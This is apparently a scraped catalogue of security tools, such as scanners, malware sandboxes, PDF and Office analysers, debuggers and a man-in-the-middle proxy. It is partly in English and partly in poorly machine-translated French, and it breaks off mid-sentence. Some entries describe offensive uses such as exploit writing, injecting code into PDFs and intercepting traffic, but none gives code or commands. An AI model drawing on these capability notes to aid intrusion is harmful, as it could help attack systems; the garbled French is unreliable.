VASTO is a Virtualization ASsessment TOolkit, a collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security aud it of virtualization solutions. It has been sponsored by Secure Network and incl udes contributions by fellow hackers. Whatweb http://www.morningstarsecurity.com/research/whatweb WhatWeb identifies websites. Its goal is to answer the question, What is that Webs ite?. WhatWeb recognises web technologies including content management systems (C MS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 900 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, a ccount IDs, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggr ession level to control the trade off between speed and reliability. When you vi sit a website in your browser, the transaction includes many hints of what web t echnologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website but when it does not, WhatWeb can inte rrogate the website further. The default level of aggression, called passive, is t he fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for in penetrati on tests. Most WhatWeb plugins are thorough and recognise a range of cues from subtle to o bvious. For example, most WordPress websites can be identified by the meta HTML tag, e.g. , but a minority of WordPress websites remove this identifying tag but t his does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, whi ch include checking the favicon, default installation files, login pages, and ch ecking for /wp-content/ within relative links. Features: * Over 900 plugins * Control the trade off between speed/stealth and reliability * Plugins include example URLs * Performance tuning. Control how many websites to scan concurrently. * Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB. * Recursive web spidering * Proxy support including TOR * Custom HTTP headers * Basic HTTP authentication * Control over webpage redirection * Nmap-style IP ranges * Fuzzy matching * Result certainty awareness * Custom plugins defined on the command line halberd http://halberd.superadditive.com/ Halberd discovers HTTP load balancers. It is useful for web application security auditing and for load balancer configuration testing. To cope with heavy traffic loads, web site administrators often install load bal ancer devices. These machines hide (possibly) many real web servers behind a vir tual IP. They receive HTTP requests and redirect them to the real web servers in order to share the traffic between them. Halberd is a tool aimed at discovering real servers behind virtual IPs.

iScanner http://iscanner.isecur1ty.org/ iScanner is free open source tool lets you detect and remove malicious codes and web pages viruses from your Linux/Unix server easily and automatically. This tool is programmed by iSecur1ty using Ruby programming language and it's re leased under the terms of GNU Affero General Public License 3.0. please note that this website is under construction. check it later for updates. Current Features: * Detect malicious codes in web pages. This include hidden iframe tags, javascri pt, vbscript, activex objects and PHP codes . * Extensive log shows the infected files and the malicious code. * Send email reports. * Ability to clean the infected web pages automatically. * Easy backup and restore system for the infected files. * Simple and editable signature based database. * Ability to update the database and the program easily from dedicated server. * Very flexible options and easy to use. * Fast scanner with good performance. * Yes, it's FREE!! nmap http://nmap.org/ Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also f ind it useful for tasks such as network inventory, managing service upgrade sche dules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (applic ation name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, a nd dozens of other characteristics. It was designed to rapidly scan large networ ks, but works fine against single hosts. Nmap runs on all major computer operati ng systems, and official binary packages are avalable for Linux, Windows, and Ma c OS X. nmapsi4 http://code.google.com/p/nmapsi4/ NmapSi4 is a complete Qt4-based Gui with the design goals to provide a complete nmap interface for Users, in order to management all options of this powerful se curity net scanner! procnetmonitor http://securityxploded.com/procnetmonitor.php ProcNetMonitor is the free tool to monitor the network activity of all running p rocess in the system. It displays all open network ports (TCP/UDP) and active ne twork connections for each process. It has advanced color based auto analysis sy stem to make it easy to distinguish network oriented processes from others with just one glance at the list. Newer version also presents unique 'Port Finder' fe ature which makes it easy to search for particular port in all running process w ith just one click. It also comes with export feature to save the entire process -port list to standard HTML file for offline analysis. All these features combined together make it very effective tool in combating th

e Trojans and Spywares installed on the system which continuously send keyboard strokes, online account data and other sensitive information to remote server. Websites URLvoid http://www.urlvoid.com/ wepawet http://wepawet.iseclab.org/index.php Wepawet is a service for detecting and analyzing web-based malware. It currently handles Flash, JavaScript, and PDF files. Traduction (anglais > franais) http://www.gstatic.com/translate/sound_player2.swf Catalogue des outils Analyse Artemisa http://sourceforge.net/projects/artemisa/ Artemisa est un logiciel libre de VoIP / SIP honeypot logiciels spcifiques conus p our se connecter un domaine d'entreprise VoIP comme un backend user-agent afin d e dtecter une activit malveillante un stade prcoce. En outre, le pot de miel peut j ouer un rle dans l'ajustement en temps rel des politiques de scurit de domaine de l' entreprise o elle est dploye. Artemisa devrait fonctionner comme un agent utilisateur classique d'un VoIP / SI P de domaine. Pour y parvenir, il fournit des fichiers de configuration modulair e o l'administrateur peut configurer les paramtres de connexion ainsi que le compo rtement de l'Artemisa de. Le serveur d'enregistrement SIP du domaine doit tre galement configur pour laisser Artemisa tre enregistres avec un ensemble d'extensions (par exemple 5 extensions d e 401 405). Une fois Artemisa est configur et lanc, ce qui est suggr de le faire sur une machine spare ou la machine virtuelle, il continue d'couter et d'attente pour l'activit SIP. Normalement, on s'attend pas voir l'activit SIP sur le pot de miel, comme un appel, depuis le pot de miel ne reprsente pas un tre humain. Ainsi, tout appel ou un message qui atteignent le pot de miel est suspect et est analyse. L'analyse implique l'utilisation de diffrentes techniques et outils tiers afin de dterminer et de qualifier la nature du message. Lorsque le message est class et u ne conclusion est obtenue, les rapports Artemisa que de plusieurs faons, comme la course scrits configurable par l'utilisateur et l'envoi d'un rapport sur l'e-ma il. Les scripts configurables par l'utilisateur permettent l'administrateur de d onner Artemisa la puissance suffisante pour ajuster les politiques de domaine en temps rel. Coucou http://www.cuckoobox.org/ Coucou est une solution lgre qui effectue automatis d'analyse dynamique des binaire s Windows fourni. Il est capable de retourner des rapports dtaills sur les appels cl API et de l'activit rseau.Caractristiques actuelles sont les suivantes: * Rcuprer les fichiers partir d'URL distance et de les analyser. * Trace pertinentes des appels d'API d'analyse comportementale.

* * * * * *

Surveiller les processus de manire rcursive naissains. Le trafic rseau gnr Dump. Excuter une analyse concomitante sur plusieurs machines. Logiciel d'analyse de soutien personnalis bas sur les scripts AutoIt3. Intercept tlcharg et les fichiers supprims. Prendre des captures d'cran en cours d'excution.

DNS Sinkhole

http://isc.sans.edu/diary.html?storyid=9037 Un gouffre est dfinie comme un processus dans lequel nous rediriger rseau IP spcifi que des visiteurs cibls pour une varit de facteurs de scurit, tout comme l'analyse, l e dtournement des attaques et la dtection d'activits anormales. Il a prolong t dploys r Tier-1 FAI l'chelle mondiale couramment pour protger leurs clients en aval. comm ent jamais pour les administrateurs rseau, les dolines sont couramment dploys pour offrir de prcieux renseignements concernant les menaces de scurit de leurs rseaux so nt confronts. Lisez la suite ci-dessous pour des faits supplmentaires sur dolines ainsi que le couple a de sortes de mise en uvre des dolines - darknets et honeyne ts et comment vous pouvez les utiliser ventuellement pour obtenir des faits impor tants concernant les menaces et les erreurs de configuration de votre rseau. DOMScan http://blueinfy.com/tools.html DOMScan est un utilitaire pour disque IE et de capturer en temps rel DOM partir d u navigateur. Il donne accs DOM contexte actif avec JavaScript. On peut observer les DOM en dtail l'aide de cet utilitaire. Il a des rgles prdfinies pour numriser DOM . On peut excuter l'analyse sur les DOM existants et chercher les points d'entre i ntressante et appels. Il permet de tracer travers des variables JavaScript. L'uti lisation de ce seul utilitaire permet d'identifier les vulnrabilits suivantes. XSS DOM sur la base DOM sur la base des appels vulnrables Source d'abus et de mthodes de chargement de contenu externe logique DOM possibles et la couche d'affaires appels mme origine des appels de contournement et de l'utilisation Mashup utilisation l'intrieur DOM Widget examen de l'architecture en utilisant l'outil DOMTracer http://blueinfy.com/tools.html DOMTracer - Firefox Plugin (trace les appels DOM et JavaScript) # Les DOM comme on le voit dans tous les cas ci-dessus doit tre analys dans de nom breux aspects. l'analyse d'excution des DOM / JavaScript est vitale et une aides d'examiner les appels effectus au cours de la manipulation dynamique DOM. Le DOMTr acer est une extension Firefox pour le mme but. Il a t crit en utilisant la mthode st andard de l'criture d'extensions en utilisant la plate-forme XUL et le langage Ja vaScript dans la majorit. Ceci est en version bta et nous travaillons sur de nouve lles fonctionnalits. DarunGrim http://www.darungrim.org/ DarunGrim est un outil de comparer des binaires. DarunGrim est un outil diffing libre qui offre des fonctionnalits diffing binaire. diffing binaire est une technique puissante pour la rtro-ingnierie correctifs publ is par les diteurs de logiciels comme Microsoft.Surtout en analysant les correctif s de scurit vous pouvez creuser dans les dtails de la vulnrabilit c'est de fixation.

Vous pouvez utiliser cette information pour savoir ce qui cause la rupture de lo giciels. galement que l'information peut vous aider crire des codes de protection pour les vulnrabilits spcifiques. Il est galement utilis pour crire des exploits de 1 jour par les auteurs de logiciels malveillants ou des chercheurs en scurit. Cette technique diffing binaire est particulirement utile pour les fichiers binai res Microsoft. Pas comme d'autres fournisseurs qu'ils ne rejettent patch rgulireme nt et les vulnrabilits patch sont relativement concentrs dans de petites zones dans le code. Ce qui fait la part patch plus visible et vident pour les analyseurs de p atch. Il ya un "eEye Binary diffing Suites", sorti en 2006 et il est largement u tilis par les chercheurs pour identifier les vulnrabilits de scurit. Mme si il est gra tuit et opensource, il est suffisamment puissant pour tre utilis cet effet de chas se des vulnrabilits.Maintenant, je suis librant DarunGrim2 qui est un C + + port de codes python original. DarunGrim2 est beaucoup plus rapide que l'original Darun Grim. Faster Unpacker Universal http://code.google.com/p/fuu/ FUU (plus rapide universelle Unpacker) est une interface graphique Windows outil avec un ensemble d'outils (plugins) pour vous aider dcompresser, dcompresser et dc rypter la plupart des programmes de repas, compresss ou crypts avec les programmes knowns trs bien la protection des logiciels comme UPX, ASPack,FSG, ACProtect, et c L'interface graphique a t conu en utilisant RadASM et MASM.Chaque plugin inclus dan s la version officielle a t crit en utilisant ASM MASM. Le noyau de chaque plugin SDK de l'utilisation TitanEngine ReversingLabs sous le capot, cette aide au dveloppeur d'crire des plugins trs facile et trs rapide sans a voir se proccuper de certaines fonctions rptitives et ennuyeuses comme dump, fixer la RAI, ajouter des sections, etc Vous pouvez dvelopper un plugin pour FUU d'une manire trs facile utiliser TitanEngine. En outre, FUU comprennent des outils supplmentaires comme: * * * * Finder OEP gnrique Dtecteur Signature Cryto Unpacker gnrique Signatures Detector (prochaine version)

Fileformats Origami http://security-labs.org/origami/ l'origami est un cadre conu pour analyser Ruby, analyser et tablir des documents P DF. Ce n'est pas une bibliothque de rendu PDF. Il vise fournir un outil de script pour gnrer et analyser un fichier PDF malicieux. En outre, il peut tre utilis pour crer sur la vole au format PDF personnaliss, ou pour injecter (mal) en code documen ts dj existants. Caractristiques * Crez des documents PDF partir de zro. * Analyse des documents existants, les modifier et les recompiler. * Dcouvrez des documents au niveau de l'objet, aller en profondeur dans la struct ure du document, dcompression objet PDF ruisseaux et desobfuscating noms et des c ordes. * Les oprations de haut niveau, telles que le chiffrement / dchiffrement, signatur

e, pices jointes ... * Une interface GTK pour naviguer rapidement dans le contenu du document. PDFStreamDumper http://sandsprite.com/blogs/index.php?uid=7&pid=57 PDF Stream Dumper est un outil gratuit qui aide l'analyse des documents PDF mali cieux. Il a aussi quelques fonctionnalits qui peuvent le rendre utile pour le dvel oppement vulnrabilit PDF. Des outils spcialiss qui traitent de code JavaScript obscu rcie, le faible niveau d'en-tte et le lecteur PDF objet sont disponibles. En term es d'analyse shellcode, il dispose d'une interface intgre pour sctest libemu, une mise jour de construire SCLOG iDefense, et une fonction shellcode_2_exe. des out ils JavaScript comprennent l'intgration avec JS-Beautifier pour le formatage du c ode, la possibilit d'excuter des portions du script vivre pour vivre de-faux-fuyan ts, ainsi qu'un moteur de refactorisation assez stable qui va analyser un script et remplacer les noms de toutes les fonctions screwy alatoire et variable avec l ogique versions expurges pour une meilleure lisibilit sont galement disponibles. Liste complte des fonctionnalits * Filtres supports: FlateDecode, RunLengthDecode, ASCIIHEXDecode, ASCII85Decode, LZWDecode * Des outils intgrs shellcode: o gui SCLOG (Shellcode outil d'analyse) o libemu scdbg outil d'analyse bas Shellcode o fonctionnalit Shellcode_2_Exe o Export unescaped octets de fichier * Prend en charge le chanage de filtre (c.--plusieurs filtres appliqus un mme flux) * Supporte unescaping ttes pdf cod * Interface scriptable pour traiter plusieurs fichiers et gnrer des rapports * Voir tous les objets pdf * Voir dgonfl les cours d'eau * Voir les dtails flux telles que les compensations de fichiers, d'en-tte, etc * Enregistrer les donnes brutes et dgonfl * Recherche flux pour les chanes * Scan pour les fonctions qui contiennent des exploits pdf (dumb scan) * Js javascript en forme en utilisant beautifier (voir les crdits dans le fichier README) * Voir le cours d'eau comme des dumps hexa * Zlib compresser / dcompresser des fichiers arbitraires * Remplacer / mise jour des flux pdf avec vos propres donnes * Basic interface JavaScript afin de pouvoir excuter les parties de scripts intgrs * PdfDecryptor w / source - iTextSharp utilise et requiert Net Framework 2.0. * Base de JavaScript-obsfuscator * Peut cacher: en-tte que les cours d'eau, double flux, certains flux * JS interface utilisateur a galement accs une classe de bote outils o simplifier les chanes fragment o les fichiers en lecture / criture o ne hexdumps o ne dcode unicode scurit moteur dsassembleur o o reproduire certaines communes Adobe API (nouveau) PDF Stream Dumper soutient galement unescaping / mise manipul en-ttes de fichier PD F, tout en tant capable de dcoder les chanes de filtre (plusieurs filtres appliqus l 'objet mme flux.) Via des plugins et ajoute des fonctionnalits d'automatisation vi a des scripts VBS diffrents. scripts d'automatisation en cours:

* Csv_stats.vbs - csv builds avec les rsultats de la barre de statut infrieur pour tous les fichiers dans un rpertoire * Pdfbox_extract.vbs - PDFBox utiliser pour extraire toutes les images et le tex te d'un fichier actif * String_scan.vbs - analyser tous les flux dcompress dans tous les fichiers dans u n rpertoire pour une chane que vous saisissez * Unsupported_filters.vbs - scanner un rpertoire et tablir une liste de tous les f ichiers PDF, qui ont des filtres non pris en charge * Filter_chains.vbs - scanne rcursivement rpertoire parent pour les fichiers PDF q ui utilisent des filtres d'encodage sur un flux. * Obsfuscated_headers.vbs - scanne rcursivement rpertoire parent pour les fichiers PDF qui ont obsfuscated ttes objet * Pdfbox_extract_text_page_by_page.vbs - utilise PDFBox pour extraire des donnes de page dans des fichiers individuels PyOLEScanner https: / / github.com / Evilcry / scripts Python PyOLEScanner - malveillant de dtection de fichiers Office http://evilcodecave.blogspot.com/2010/08/malicious-office-files-analysis Lire la suite ... pour plus d'informations de fond Version 1.3 contient: 1. 2. 3. 4. 5. 6. Correction d'un bug. Plus Shellcode dtection. Plus d'API de dtection. SQLite Support. Macro OLE2 Scan. Office2007 (docx / pptx / xlsx) vrifie dgonfler et Macro.

Rpertoire scan fonctionne aussi, en prsence de chiffrement un dchiffr exemplaire. UTILISATION: _suspect_document pyOLEScanner.py python Compatibilit avec Windows et Linux est maintenu. flasm http://www.nowrap.de/flasm.html Flasm dsassemble votre SWF entier, y compris tous les dlais et les vnements. En rega rdant le dmontage, vous apprendrez comment fonctionne le compilateur de Flash, ce qui amliore vos comptences ActionScript. Vous pouvez galement faire quelques optim isations sur le code dsassembl la main ou ajuster le code que vous le souhaitez. F lasm applique ensuite les modifications apportes l'original SWF, en remplacement des actions originales. Il est galement possible d'intgrer des actions flasm dans votre code ActionScript, ce qui rend l'optimisation de grands projets plus l'aise. Flasm n'est pas un dcompilateur. Qu'est-ce que vous obtenez est la reprsentation l isible de bytecode SWF, pas source ActionScript. Si vous tes la recherche d'un dco mpilateur, Flare peut rpondre vos besoins. Toutefois, Flare ne peut pas modifier le fichier SWF. swfmill http://www.swfmill.org/ Son utilisation la plus courante est la gnration de bibliothques de ressources cont

enant des images (PNG et JPEG), les polices (TTF) ou d'autres films SWF pour une utilisation avec MTASC ou haXe compil ActionScript, bien swfmill peut tre utilis p our produire la fois des structures simples et complexes SWF . * Construit autour d'un XSLT / processeur EXSLT (libxslt) * Entre et de sortie de la transformation XSLT peut tre soit XML ou binaire SWF * les commandes XSLT pour l'importation de PNG, JPEG, SWF et TTF, et pour la car tographie SWF numros d'identification * Built-in "dialecte simple" pour soutenir la cration et le renforcement des fond s souverains bibliothque simple swfmill a t crit par Daniel Turing, mais est maintenant mis jour par Daniel Cassidy . Il comprend des contributions substantielles par Ralf Fuest, Steve Webster et d'autres. Graudit http://www.justanotherhacker.com/projects/graudit/download.html Graudit est un script simple et ensembles de signature qui vous permet de trouve r des failles de scurit potentielles dans le code source en utilisant l'utilitaire grep de GNU. Il est comparable d'autres applications d'analyse statique comme d es rats, et vice-SWAAT viseur. Version 1.8 *-L 'oprateur ne vim numros de ligne convivial Man pages * et mises jour de documentation * Mises jour la signature PHP * Mises jour la signature JSP * Mises jour la signature Dotnet * Mises jour la signature Perl et corrections de bugs * Mises jour la signature Python Bug * aux correctifs pour / scripts Plus * aux / scripts * Correction d'ignorer les rpertoires CVS par dfaut IEZoneAnalyzer http://blogs.technet.com/b/fdcc/archive/2011/04/14/iezoneanalyzer-v3.aspx IEZoneAnalyzer est un utilitaire pour visualiser et comparer les paramtres d'Inte rnet Explorer zone de scurit. Il est particulirement utile sur les systmes contrls par la stratgie de groupe, laquelle la norme de scurit bote de dialogue des paramtres ne permet pas l'affichage des paramtres.IEZoneAnalyzer version 3 reprsente une rcritur e totale, l'ajout d'une quantit considrable de nouvelles fonctionnalits par rapport aux versions antrieures. Notez que IEZoneAnalyzer ne ncessite pas de droits d'adm inistration. Il n'a pas non plus un programme d'installation - il suffit d'excute r l'utilitaire directement.IEZoneAnalyzer ne require.NET Framework 3.5. Les principales caractristiques de IEZoneAnalyzer: * Voir les paramtres de zone de scurit efficace pour toute la zone de scurit sur l'or dinateur local ou exportes partir d'un ordinateur distant et d'identifier si chaq ue paramtre a t cr par la politique. * Comparez les paramtres entre deux ou plusieurs zones de scurit ou de modles. * Voir et comparer des ensembles complets de paramtres capturs sur diffrents ordina teurs ou sur un seul ordinateur dans le temps (par exemple, pour dterminer si un systme a dvi de ses rglages de base). * Rsultats l'exportation vers Excel ou vers un fichier texte Comma Separated Valu es (CSV). * Comparaison des rsultats du filtre pour voir seulement les diffrences ou les con

flits. * Trier, rorganiser et redimensionner les colonnes du rsultat. * Copie slectionn ou tous les rsultats dans le presse papier. INetSim http://www.inetsim.org/index.html L'objectif du projet INetSim est d'effectuer une analyse rapide d'excution du com portement du rseau des chantillons de logiciels malveillants inconnus dans un envi ronnement de laboratoire. Modules pour la simulation des services suivants sont inclus: * * * * * * * * * * * * HTTP / HTTPS SMTP / SMTPS POP3 / POP3S DNS FTP / FTPS TFTP IRC NTP Ident Finger Syslog Dummy.

Immunit Debugger http://www.immunityinc.com/products-immdbg.shtml Immunit Debugger est un nouveau moyen puissant pour crire des exploits, analyser l es programmes malveillants, et d'inverser les fichiers binaires ingnieur. Il s'ap puie sur une interface utilisateur graphique solides avec la fonction, d'une par t de l'industrie l'outil d'analyse tas construit spcifiquement pour la cration du tas, et un grand et bien pris en charge l'API Python pour l'extensibilit facile. -Un dbogueur avec des fonctionnalits conues spcifiquement pour l'industrie de la scur it -Morceaux d'exploiter le temps de dveloppement de 50% -Simple, comprhensible interfaces -Robuste et puissant langage de script pour automatiser le dbogage intelligent -Lger et rapide mise au point pour prvenir la corruption lors de l'analyse complex e -Une connexion fuzzers et d'exploiter les outils de dveloppement Mallory http://intrepidusgroup.com/insight/mallory/ Mallory est un transparent TCP et UDP proxy. Il peut tre utilis pour obtenir lors de ces difficiles intercepter des flux rseaux, valuer les applications Web mobile dlicate, ou peut-tre il suffit de tirer une blague votre ami. En termes plus techniques, Mallory est un extensible TCP / UDP homme dans le mil ieu proxy qui est conu pour tre excut en tant que passerelle. L'objectif est pour l'homme dans le milieu de la circulation des fins de test. L a configuration idale pour Mallory est d'avoir une LAN ou victime que Mallory rseau ag it en tant que passerelle pour. Cela peut tre configur dans un environnement de ma chines utilisant des interfaces d'accueil virtal seul rseau. Les machines virtuel les victime puis configure la machine Mallory que la passerelle par rgler manuell ement sa passerelle. La machine passerelle aura au moins une interface WAN qui a

ccorde l'accs Internet. Le rseau victime utilise ensuite la passerelle Mallory pou r acheminer le trafic. Structure des dossiers * Ca - autorit de certification fichiers, y compris la cl prive de Mallory * Certs - certs MiTM qui sont crs la vole * Db - rpertoire o sont stockes toutes les donnes des fichiers mallory mallory * - rpertoire vide * Src - o le code des vies * Les scripts - scripts utiliss pour configurer l'environnement de mallory Fuzzer fichier MiniFuzz http://www.microsoft.com/downloads/en/details.aspx?FamilyID=B2307CA4-638F-4641-9 946-DC0A5ABE8513 & 3bdisplaylang% = fr & pf = true MiniFuzz est un outil de test de base conu pour aider dtecter les failles du code qui peut exposer les failles de scurit dans le code de gestion des fichiers. Cet o util cre de multiples variations alatoires du contenu du fichier et il se nourrit de l'application pour tester le code dans une tentative d'exposer le comportemen t des applications inattendues et potentiellement dangereux. NetworkScanViewer http://www.woany.co.uk/networkscanviewer/ NetworkScanViewer est une application graphique conu pour aider afficher les rsult ats de nessus (v4) et nmap (v5) les rsultats d'analyse. Il combine les fonctionna lits des deux NessusViewer et NmapViewer. Le chargement de l'application de l'analyse des donnes de nessus et nmap XML, fai t un peu de nettoyage des donnes, puis affiche les rsultats sur la liste des rsulta ts. Les donnes de la liste peut tre trie en cliquant sur les en-ttes de colonnes, il est facile de commander et de trouver de l'information notamment. Il ya aussi l a possibilit de filtrer des informations spcifiques, comme hte, le port, etc servic e il est donc facile de forer vers le bas pour des informations spcifiques. Les exportations de la fonctionnalit d'exportation en utilisant les donnes figuran t dans la liste des rsultats, donc si vous changez l'ordre de tri ou filtrer les rsultats, il se reflte dans l'exportation. Il est galement possible d'exclure de ma nire permanente scripts qui vient de gnrer du bruit par un clic droit sur l'lment et en slectionnant "Ignorer Plugin" dans le menu contextuel. scripts exclus peuvent t re rajouts tout moment en utilisant la fentre Options. Caractristiques * * * * * Le nettoyage des donnes Exporter au format CSV et XML Sortable colonnes de donnes Filtrage des donnes Script exclusion

ProcNetMonitor http://securityxploded.com/procnetmonitor.php ProcNetMonitor est l'outil gratuit pour surveiller l'activit rseau de tous les pro cessus en cours dans le systme. Il affiche tous les ports d'un rseau ouvert (TCP / UDP) et les connexions rseau actives pour chaque processus. Il a avanc la couleur systme bas analyse automatique pour le rendre facile de distinguer les processus rseau orient des autres avec un seul coup d'il sur la liste.

Il prsente galement des caractristiques uniques Port Finder" de chercher facilement le port particulier dans tous les processus en cours avec un seul clic. Il est ga lement livr avec fonction d'exportation pour enregistrer la liste complte des proc essus de port un fichier HTML standard pour l'analyse hors-ligne. SQLInject Finder http://code.google.com/p/sqlinject-finder/ Brve description Simple script python qui analyse travers un pcap et se penche sur l'EEG et des d onnes requte POST pour suspectes et SQL injecte possible. Rgles pour contrler l'inje ction SQL peuvent tre facilement ajouts. La sortie peut tre imprim avec soin sur la ligne de commande ou en format dlimit par des tabulations. La sortie comprend: * * * * L'adresse IP suspectes La page Web attaqu Le paramtre et la valeur utilise Le numro de chssis du paquet dans le pcap (peut tre utilis pour trouver exactement o le paquet est dans Wireshark) * La raison pour laquelle la demande a t signale TitanEngine http://www.reversinglabs.com/products/TitanEngine.php Avec le temps, les auteurs de malwares sont de plus en plus intelligents et ont russi trouver des moyens d'chapper un logiciel de scurit. La seule chose entre une " propre" machine et les logiciels malveillants est un analyseur de dsosser les log iciels malveillants /. Comme malwares s'quiper avec les nouvelles techniques, il devient impratif pour la rtro-ingnierie pour tester les logiciels malveillants dans le temps mis leur disposition. Des outils comme TitanEngine va srement nous aide r dans notre analyse de logiciels malveillants et les efforts d'ingnierie inverse ! Il est l'un des outils que nous avons t en attente pour le tlchargement depuis le moment o il a t annonc lors de la BlackHat 09! TitanEngine est livr OPEN SOURCE cadre de la Labs rversibles qui peuvent tre utiliss pour effectuer plus de 250 fonctions! Le meilleur de tous, vous pouvez avoir to ut cela automatis. Il peut galement tre utilis pour fabriquer de nouveaux outils qui fonctionnent avec des fichiers PE! Les deux - 32 bits et 64 bits formats sont s upports! Il peut tre utilis pour crer tous les types connus de dballeurs. Ses fonctio ns sont les suivantes: * SDK a 250 fonctions documentes * Automatisation facile de tous les outils de renverser * Prend en charge x86 et x64 * Possibilit de crer: statique, dynamique et gnrique dballeurs * Test sur plus de 150 dballeurs * C'est gratuit et open source LGPL3! * Intgr x86/x64 dbogueur * Intgr x86/x64 dsassembleur * Dumper la mmoire intgre traceur import * intgr et du fixateur * Fixateur de rinstallation intgr * Realigner de fichiers intgr * Fonctions de travailler avec TLS, ressources, les exportations, ... inspecteur du noyau Tuluka

http://www.tuluka.org/index.html uluka est un nouvel outil puissant (antirootkit), qui a les caractristiques suiva ntes: * Dtecte les processus cachs, les conducteurs et les dispositifs * Dtecte les IRP crochets * Identifie la substitution de certains champs dans la structure DRIVER_OBJECT * signatures pilote vrifie * Dtecte et restaure SSDT crochets * Dtecte les descripteurs de suspect dans GDT * De dtection de dcrochage IDT * De dtection de dcrochage SYSENTER * Affiche la liste des threads du systme et vous permet de les suspendre * API et de dtection de dcrochage en ligne * Indique les valeurs relles des registres de dbogage, mme si la lecture de ces reg istres est contrle par une personne * Permet de trouver le module du systme de l'adresse dans ce module * Permet d'afficher le contenu de la mmoire du noyau et de l'enregistrer sur le d isque * Vous permet d'enregistrer les pilotes du noyau et des modules principaux de to us les processus * Permet de mettre fin tout processus * Est capable de dissasemble gestionnaires d'interruption et de la CEI, les serv ices systme, routines dbut de threads du systme et beaucoup plus * Permet de construire la pile pour appareil slectionn * Beaucoup plus .. Affiche les informations ci-dessus indiqu dans l'interface graphique pour l'utili sateur de voir et sans doute d'utiliser ces informations pour l'analyse Vera http://www.offensivecomputing.net/?q=node/1316 VERA, le programme de l'ingnierie inverse de visualisation bas sur le projet Ether . Reverse Engineering par diapositives Crayon de la Blackhat parler. http://www.offensivecomputing.net/bhusa2009/oc-reversing-by-crayon-bhusa ... Analyse Malware via les extensions de virtualisation matrielle: Ether http://ether.gtisc.gatech.edu/ http://www.offensivecomputing.net/?q=node/1379 WinAPIOverride32 http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride32 est une source ouverte et un logiciel avanc de surveillance API pour les systmes d'exploitation Windows. Vous pouvez l'utiliser pour surveiller e t / ou remplacer toute fonction d'un processus! Vous pouvez le faire pour les fo nctions API ou excutable fonctions internes. Cela peut tre particulirement utile lo rsque vous traitez avec des malwares ou de tenter d'inverser certaines applicati ons ingnieur. Quelques-unes des fonctions WinAPIOverride32 sont les suivants: * Vous pouvez dfinir des filtres sur les paramtres ou de rsultat de la fonction * Vous pouvez dfinir des filtres sur les dll de rejeter les appels de Windows DLL systme * Vous pouvez fonctions crochet l'intrieur du processus cible non seulement API

* Vous pouvez brancher asm fonctions avec les paramtres passs travers les registre s * Vous pouvez exceptions matriel et des logiciels crochet * Double rsultats et le flotteur sont enregistrs * Vous pouvez facilement remplacer une API ou tout autre procd fonction interne * Vous pouvez casser processus avant et / ou aprs appel la fonction de mmoire chan gement ou des registres * Vous pouvez appeler des fonctions qui sont l'intrieur du processus distants * Peut interfaces COM crochet OLE et ActiveX Les types d'utilisateurs * (enum, struct et syndicat) et l'utilisateur dfinit son t pris en charge * Tout est est fait comme modules: vous pouvez vous connecter ou de remplacer de faon indpendante pour toute fonction * Open Source * Une bibliothque est prvue pour les dveloppeurs qui ont l'intention de construire un logiciel de leur accrochage WinAPIOverride32 tente de combler le foss entre les logiciels classiques de surve illance API et les dbogueurs. Vous pouvez aussi "casser" une application cible ava nt ou aprs un appel de fonction, permettant des modifications de la mmoire ou des registres, et il peut directement appeler des fonctions de l'application cible. I l s'agit d'une application merveilleuse source ouverte, crit en C + +. Analyseur de l'tat du systme Windows http://go.microsoft.com/fwlink/?LinkID=140110 http://go.microsoft.com/fwlink/?Li nkID=140109 La fonctionnalit de base de l'outil de l'tat du systme Analyzer est de vous permett re de comparer deux photos prises diffrents points dans le temps. Cela vous perme t de comparer l'tat d'une machine la fois avant et aprs une demande d'installation ou probablement vous pouvez l'utiliser dans votre VM comme une premire tape dans l'analyse des logiciels malveillants ou ingnierie inverse Cet outil est une partie de la Windows 2008 R2 Logo de certification de logiciel s et Windows 2008 R2 Logo Logiciel outils de certification.Par consquent, vous au rez besoin de tlcharger les pochettes d'information pour obtenir le systme d'tat Ana lyzer. Yara http://code.google.com/p/yara-project/ Yara est un outil visant aider les chercheurs identifier les logiciels malveilla nts et classer des chantillons de logiciels malveillants. Avec YARA vous pouvez c rer des descriptions de familles de logiciels malveillants en fonction des modles textuels ou binaires contenues sur des chantillons de ces familles. Chaque descri ption comprend un ensemble de cordes et une expression boolenne qui dtermine sa lo gique bitblaze http://bitblaze.cs.berkeley.edu/ analyse binaire est impratif de protection des COTS (commune hors-the-shelf) et l 'analyse des programmes et se dfendre contre la multitude de codes malveillants, o le code source n'est pas disponible, et le binaire peut mme tre masque. En outre, l'analyse binaire fournit la ralit de terrain sur le comportement du programme pui sque les ordinateurs d'excuter des binaires (excutables), pas de code source. Cepe ndant, l'analyse binaire est difficile en raison de l'absence de la smantique de niveau suprieur.De nombreuses techniques de niveau suprieur sont souvent insuffisa nts pour l'analyse, mme bnigne binaires, et encore moins binaires potentiellement malveillants. Ainsi, nous avons besoin de dvelopper des outils et techniques qui

